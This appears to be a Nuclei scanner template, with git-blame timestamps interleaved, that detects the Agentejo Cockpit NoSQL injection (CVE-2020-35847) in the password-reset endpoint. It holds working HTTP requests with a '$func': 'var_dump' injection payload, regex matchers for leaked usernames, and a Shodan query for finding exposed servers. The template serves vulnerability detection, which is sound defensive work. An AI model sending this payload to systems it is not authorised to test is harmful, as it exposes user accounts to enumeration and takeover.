2021-04-13 19:19:41 +00:00
|
|
|
id: CVE-2020-35847
|
|
|
|
|
|
|
|
info:
|
2022-11-29 05:44:51 +00:00
|
|
|
name: Agentejo Cockpit <0.11.2 - NoSQL Injection
|
2021-04-13 19:19:41 +00:00
|
|
|
author: dwisiswant0
|
|
|
|
severity: critical
|
2023-05-25 12:55:27 +00:00
|
|
|
description: |
|
|
|
|
Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller.
|
2023-09-06 12:22:36 +00:00
|
|
|
remediation: |
|
|
|
|
Upgrade Agentejo Cockpit to version 0.11.2 or later to mitigate this vulnerability.
|
2022-04-07 13:53:15 +00:00
|
|
|
reference:
|
|
|
|
- https://swarm.ptsecurity.com/rce-cockpit-cms/
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-35847
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://getcockpit.com/
|
|
|
|
- https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466
|
2023-07-11 19:49:27 +00:00
|
|
|
- https://github.com/agentejo/cockpit/commit/33e7199575631ba1f74cba6b16b10c820bec59af
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 9.8
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2020-35847
|
|
|
|
cwe-id: CWE-89
|
2023-10-14 11:27:55 +00:00
|
|
|
epss-score: 0.74725
|
2023-10-29 11:57:59 +00:00
|
|
|
epss-percentile: 0.97795
|
2023-09-06 12:22:36 +00:00
|
|
|
cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:*
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
2023-06-21 21:03:53 +00:00
|
|
|
verified: true
|
2023-09-06 12:22:36 +00:00
|
|
|
max-request: 2
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: agentejo
|
|
|
|
product: cockpit
|
2023-09-06 12:22:36 +00:00
|
|
|
shodan-query: http.favicon.hash:688609340
|
2022-04-07 13:53:15 +00:00
|
|
|
tags: cve,cve2020,nosqli,sqli,cockpit,injection
|
2021-04-13 19:19:41 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2023-06-08 17:45:41 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /auth/requestreset HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/json
|
|
|
|
|
|
|
|
{
|
|
|
|
"user": {
|
|
|
|
"$func": "var_dump"
|
|
|
|
}
|
|
|
|
}
|
|
|
|
- |
|
|
|
|
POST /auth/requestreset HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/json
|
|
|
|
|
|
|
|
{
|
|
|
|
"user": {
|
|
|
|
"$func": "nonexistent_function"
|
|
|
|
}
|
2021-04-13 19:19:41 +00:00
|
|
|
}
|
2021-04-13 20:07:04 +00:00
|
|
|
|
2023-05-25 12:55:27 +00:00
|
|
|
matchers-condition: and
|
2021-04-13 19:19:41 +00:00
|
|
|
matchers:
|
|
|
|
- type: regex
|
2023-06-08 17:45:41 +00:00
|
|
|
part: body_1
|
2021-04-13 19:19:41 +00:00
|
|
|
regex:
|
2023-05-25 12:55:27 +00:00
|
|
|
- 'string\([0-9]{1,3}\)(\s)?"([A-Za-z0-9-.@\s-]+)"'
|
|
|
|
|
|
|
|
- type: regex
|
2023-06-08 17:45:41 +00:00
|
|
|
part: body_1
|
2023-07-11 19:49:27 +00:00
|
|
|
negative: true
|
2023-05-25 12:55:27 +00:00
|
|
|
regex:
|
|
|
|
- 'string\([0-9]{1,3}\)(\s)?"(error404)([A-Za-z0-9-.@\s-]+)"'
|
2023-05-26 07:04:17 +00:00
|
|
|
|
|
|
|
- type: regex
|
2023-06-08 17:45:41 +00:00
|
|
|
part: body_2
|
2023-07-11 19:49:27 +00:00
|
|
|
negative: true
|
2023-05-26 07:04:17 +00:00
|
|
|
regex:
|
|
|
|
- 'string\([0-9]{1,3}\)(\s)?"([A-Za-z0-9-.@\s-]+)"'
|
2023-10-29 15:59:44 +00:00
|
|
|
|
|
|
|
# digest: 4b0a00483046022100ea9b0e779b9635496833820800d583bce350aa6c3d3da6e8bf1e41243f0d542b022100a3da4ef3c23fe06983edc82fd4079da8dc1df3e866c41a062697ad02cffc13a7:922c64590222798bb761d5b6d8e72950
|